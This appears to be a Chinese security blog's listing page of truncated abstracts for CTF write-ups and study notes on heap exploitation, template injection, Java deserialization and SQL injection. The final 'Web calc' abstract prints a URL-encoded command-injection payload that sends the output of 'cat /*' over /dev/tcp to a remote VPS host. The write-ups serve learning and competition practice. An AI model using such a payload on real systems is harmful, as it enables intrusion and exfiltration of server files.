摘要:
跟着ctf-wiki学一下fastbin attack的原理,题目有时间再看看吧xD 环境搭建? 由于在上古时期还没有tcache(这是在glibc2-26加入的),所以要换一个低版本libc进行实验。 用到的方法(注:新版本gdb不需要更改.debug) https://sillyrabbit.c 阅读全文
摘要:
Y4tacker师傅在这篇文章中给出了Pebble最新模板注入的exp 2022UIUCTF-Spoink(Pebble最新模板注入) 其中,在用internalCachingMetadataReaderFactory加载类后,使用了jacksonObjectMapper调用受限制的无参构造器。 Y 阅读全文
摘要:
一个或几个c文件从源文件到可执行文件大致经历步骤如下 下面以具体例子说明一下各个阶段(本文用c++举例,事实上c/c++是一样的) 源文件 这是我用c++简单写的一个单链的实现(水平有限,算法爹轻喷ww),部分参考单链表的基本操作C++ 一共有三个文件 head.h用于声明函数/变量/类。这里不得不 阅读全文
摘要:
两个月不写博客没被开真是个奇迹,本来这周打算比完赛之后睡大觉,但是看到nova凌晨直播Pwn属实是把我卷到了。。感觉是时候糊弄几篇博客了。但一直以来我web都是在乱学,不知道整点什么活,就看了看天枢协会的新生建议(发现完全适合我),找到了Portswigger Web Security Academ 阅读全文
摘要:
签到 签到 ez_pwn from pwn import * context(os='linux', arch='i386', log_level='debug') context.log_level='info' elf=ELF('./p') rop=ROP(elf) # p=process('. 阅读全文
摘要:
Q=[] mod=int(input()) dig=int(input()) JK=[] def INPUT(): for i in range(mod): Qi=[] Qi_np1=[] for j in range(dig): k=int(input()) Qi.append(k) for j 阅读全文
摘要:
Mini-L-CTF-2022 minispringboot Spring View Manipulation注入,也是基于Thymeleaf的ssti。当时get参数是个?name=xxx,强烈怀疑是注入点,但是没反应。结果路由也是可以注的 可参考 https://book.hacktricks. 阅读全文
摘要:
Java反序列化学习--从URLDNS到CommonsCollections1-7 前言 前段时间陆续接触了一些java题,也了解了一些java反射的知识。但是一入java深似海,拿到一个题基本毫无头猪。昨天看了看nama大学霸在车联网安全赛上出的ezcc,预期解是把cc链和cb链给拼一拼。然而缺少 阅读全文
摘要:
babysql 题目hint.md: CREATE TABLE `auth` ( `id` int NOT NULL AUTO_INCREMENT, `username` varchar(32) NOT NULL, `password` varchar(32) NOT NULL, PRIMARY K 阅读全文
摘要:
Web calc 利用 os.system(log) ,反引号执行子命令 开头1#注释绕过eval,末尾<绕过重定向,制表符绕过空格,最后cat /*重定向到vps上 num=1%23%60cat%09/%2A%60%3E/dev/tcp/vpsip/2333%3C ezpop 换行绕最后的#,fl 阅读全文